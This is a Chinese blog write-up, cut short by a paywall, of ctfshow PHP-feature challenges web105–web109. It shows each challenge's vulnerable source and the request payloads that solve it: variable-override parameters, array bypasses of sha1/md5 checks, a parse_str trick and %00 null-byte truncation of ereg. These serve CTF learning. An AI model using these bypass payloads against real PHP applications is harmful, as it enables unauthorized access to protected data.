ctfshow web入门 PHP特性中篇(web105-web132)

最新推荐文章于 2024-06-11 16:29:47 发布
最新推荐文章于 2024-06-11 16:29:47 发布
阅读量1.3k 收藏 3
点赞数 4
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccfly1012/article/details/120240250
版权

目录

web105

web106

web107

web108

web109

web110

web111

web112

web113

web114

web115

web123

web125

web126

web127

web128

web129

web130

web131

web132

web105

 <?php
​
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07
​
*/
​
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);
​
?>

你还想要flag嘛?
 

 
 
hint中的解法
 

 

GET:?suces=flag POST:error=suces
 

首先一段一段的看代码
 

第一段
 

foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
 

说的是,我们GET传参,传入的值不能为error
 

第二段
 

foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
 

post传入参数,传入的值不能为flag
 

第三段
 

if(!($_POST['flag']==$flag)){
    die($error);
}
 

POST传入的值不为变量flag,则输出变量error
 

GET:?a=flag
POST:error=a
 

先将flag的值赋给a,然后再赋值给error,利用die()函数输出
 

web106
 

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:38:27
​
*/
​
​
highlight_file(__FILE__);
include("flag.php");
​
if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}
​
​
​
?>
 

数组绕过就可
 

GET:?v2[]=1
POST:v1[]=2
 

web107
 

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:24:14
​
*/
​
​
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
​
if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }
​
}
​
​
​
?>
 

 
 
parse_str()函数
 

 

parse_str(string,array)
把查询字符串解析到变量中。
string必选。规定要解析的字符串
array可选。规定存储变量的数组的名称。
 

很明显,题目要将v1的值赋给v2,然后v3的md5等于v2输出flag
 

payload:
 

GET:?v3=a //a可以为任意字符
POST:v1=flag=0cc175b9c0f1b6a831c399e269772661 //a的md5值
 

 
 
md5无法解析数组

 

 

GET:?v3[]=1
POST:v1="flag=0"
 

web108
 

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:53:55
​
*/
​
​
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
​
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');
​
}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}
​
?> 
 

ereg函数为匹配函数
 

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');
​
}
 

GET参数c要只能为字母,否则die函数
 

函数在NULL截断漏洞,导致了正则过滤被绕过,所以可以使用%00截断正则匹配
 

后一段
 

if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}
 

strrev函数
 

函数反转字符串
 

正常的话,想要形成的
 

877%00a
 

再进行反转,a正好匹配了ereg函数
 

a%00778
 

web109
 

<?php
​
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-29 22:02:34
​
*/
​
​
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
​
    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
            eval("echo new $v1($v2());");
    }
​
}
​
?><

                

        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  parkour-
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    4
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    3
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
CTFshow php特性 web105

				
			

			

				

					Kradress的博客
				

				

					12-14
					
					358
					
				

			

		

		

			
				
目录源码思路题解总结

源码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07

*/

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你

			
		

	



                

              
                



	

		

			

				
					
详解LINQ入门中篇

				
			

			

				

					08-25
				

			

		

		

			
				
主要介绍了详解LINQ入门中篇),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧

			
		

	



                


  
              

                


	

		

			

				
					
ctfshow web139命令盲注脚本

				
			

			

				

					10-21
				

			

		

		

			
				
ctfshow靶场 web入门 web139 命令盲注脚本

			
		

	





	

		

			

				
					
ctfshow-web105(php特性)

				
			

			

				

					m0_62094846的博客
				

				

					01-17
					
					783
					
				

			

		

		

			
				
考察:php变量覆盖

foreach语法结构提供了遍历数组的简单方式。




<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07

*/

highlight_file(__FILE__);
include('flag.php');
e..

			
		

	



		

			
		



	

		

			

				
					
CTFSHOW 入门web105

				
			

			

				

					qq_59970501的博客
				

				

					09-20
					
					550
					
				

			

		

		

			
				
ctfshow104

源码


highlight_file(__FILE__);
include("flag.php");
​
if(isset($_POST['v1']) && isset($_GET['v2'])){
   $v1 = $_POST['v1'];
   $v2 = $_GET['v2'];
   if(sha1($v1)==sha1($v2)){ 进行shal加密
     echo $flag;
   }
}
​
​
​
?>

这题只要POST...

			
		

	





	

		

			

				
					
CTFshow php特性 web132

				
			

			

				

					Kradress的博客
				

				

					12-17
					
					199
					
				

			

		

		

			
				
目录源码思路题解总结

源码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 06:22:13
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-13 20:05:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

#error_reporting(0);
include(

			
		

	





	

		

			

				
					
ctfshow web入门128-132

				
			

			

				

					akxnxbshai的博客
				

				

					02-28
					
					850
					
				

			

		

		

			
				
Web 128


<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-10 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-12 19:49:05

*/


error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

$f1 = $_GET['f1']

			
		

	





	

		

			

				
					
ctfshow 105-127

				
			

			

				

					weixin_58519918的博客
				

				

					06-15
					
					684
					
				

			

		

		

			
				
wu 

			
		

	





	

		

			

				
					
CTFshow web(php特性 105-108)

				
			

			

				

					csjjjd的博客
				

				

					02-04
					
					1555
					
				

			

		

		

			
				
明白了这个那接下来就好办了,直接令suces=flag然后再在POST上传error=flag。因为只有36d身材的人才能看到flag(doge),吓得我差点去叫了学姐外援做题,哈哈哈哈哈哈。哈希函数主流绕过就一个,拿出数组绕过,只要保证后面的数字不一样就好了。函数搜索由指定的字符串作为由模式指定的字符串,如果发现模式则返回。包含由正则表达式中的括号组成的所有匹配表达式的数组。$suces='既然你想要那给你吧!这里我的一篇文章有相关知识点,这种。搜索对于字母字符是区分大小写的。

			
		

	





	

		

			

				
					
SQL查询入门(中篇)

				
			

			

				

					09-11
				

			

		

		

			
				
SQL查询入门(中篇)

			
		

	





	

		

			

				
					
SecretKeys:这是中篇文章的源代码-Android app source code

				
			

			

				

					03-24
				

			

		

		

			
				
秘钥 使用Android NDK保护API密钥。 执照 ...Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the ...

			
		

	





	

		

			

				
					
react-native-custom-icon:中篇文章

				
			

			

				

					08-04
				

			

		

		

			
				
安装 添加依赖: 纯 React Native:   npm i react - native - custom - icon 对等依赖 重要的! 你需要安装它们。   " react " : " >= 16.x " , " react-native " : " >= 0.55.x " , " react-native-vector-icons ...

			
		

	





	

		

			

				
					
ctfshow---php特性

				
			

			

				

					fainpo的博客
				

				

					04-02
					
					1210
					
				

			

		

		

			
				
使用此管道符“|”可以将两个命令分隔开,“|”左边命令的输出就会作为“|”右边命令的输入,此命令可连续使用,第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。就是比如get传入a=1第一个foreach的$key就是a,$value就是1,利用die($error) 这里退出会输出$error,所以将flag的值赋值给他就能得到flag,当然第一个if不让,所以我们利用一个跳板。_()==gettext() 是gettext()的拓展函数,开启text扩展。

			
		

	





	

		

			

				
					
CTFshow--web入门--php特性(持续更新ing)

				
			

			

				

					qq_46874275的博客
				

				

					05-17
					
					918
					
				

			

		

		

			
				
~目录~开始web89 数组绕过web90 intval()特性web91 正则匹配web92 intval()特性web93 intval()特性web94 intval()特性
开始
web89 数组绕过
正则匹配
传数组会返回false
?num[]=0

web90 intval()特性
考察intval()的使用
绕过的姿势有很多
?num=4476.0

web91 正则匹配
/i匹配的时候不区分大小写
m多行匹配,若存在换行\n并且有开始^或结束$符的情况下,将以换行为分隔符,逐行进行匹配
%

			
		

	





	

		

			

				
					
php parse ini str,php parse_str() 函数的定义和用法

				
			

			

				

					weixin_28902131的博客
				

				

					03-10
					
					147
					
				

			

		

		

			
				
php parse_str() 函数把查询字符串解析到变量中,主要用于页面之间传值(参数)。本文章向码农介绍php parse_str() 函数的使用方法,感兴趣的码农可以参考一下。定义和用法parse_str() 函数把查询字符串解析到变量中。注释:如果未设置 array 参数,则由该函数设置的变量将覆盖已存在的同名变量。注释:php.ini 文件中的 magic_quotes_gpc 设置影响...

			
		

	





	

		

			

				
					
ctfshow web入门 web103-web107

				
			

			

				

					m0_62207170的博客
				

				

					08-23
					
					527
					
				

			

		

		

			
				
ctfshow web入门 web103-web107

			
		

	





	

		

			

				
					
ctfshow学习记录-web入门php特性99-108)

				
			

			

				

					龟速更新的九某人
				

				

					07-18
					
					823
					
				

			

		

		

			
				
ctfshow学习记录-web入门php特性web99-108)

			
		

	





	

		

			

				
					
ctfshow web11详解,小白补充session和PHPSESSID相关知识

				
			

			

				

					weixin_73562787的博客
				

				

					07-30
					
					295
					
				

			

		

		

			
				
当用户访问php网址时,服务器会将生成的PHPSESSID值发送给用户的浏览器,并保存在名为PHPSESSID的cookie中,浏览器在随后的请求中会自动将这个cookie发送回服务器,这样,服务器可以通过这个唯一的标识符识别用户,并获取与用户关联的会话数据。PHPSESSID cookie的值是随机生成的,并且大部分情况下是基于用户的会话信息和一些其他参数生成的哈希值,这样做是为了确保PHPSESSID的唯一性和安全性,以防会话劫持和其他安全漏洞。的,通常以文件或数据库的形式保存。

			
		

	





	

		

			

				
					
三丰云免费虚拟主机和免费云服务器评测

					
最新发布

				
			

			

				

					qq_43659685的博客
				

				

					06-11
					
					441
					
				

			

		

		

			
				
三丰云是一家提供免费虚拟主机和免费云服务器的互联网服务提供商,通过他们的平台,用户可以免费搭建自己的网站和应用。在这篇评测文章中,我们将针对三丰云提供的免费虚拟主机和免费云服务器进行详细评测。

首先,我们来看看三丰云的免费虚拟主机服务。通过三丰云的平台,用户可以免费获取一个稳定可靠的虚拟主机空间,支持多种网站构建工具,如WordPress、Joomla等。用户可以自行选择适合自己的搭建工具,快速轻松地建立起自己的网站。而且,三丰云的免费虚拟主机还支持PHP、MySQL等多种技术,满足用户的各种需求。

接

			
		

	





	

		

			

				
					
nsga-iii算法的matlab代码

				
			

			

				

					09-04
				

			

		

		

			
				
- *3* [多目标优化 | NSGA-Ⅲ(中篇,附MATLAB代码)](https://blog.csdn.net/weixin_40730979/article/details/130437411)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值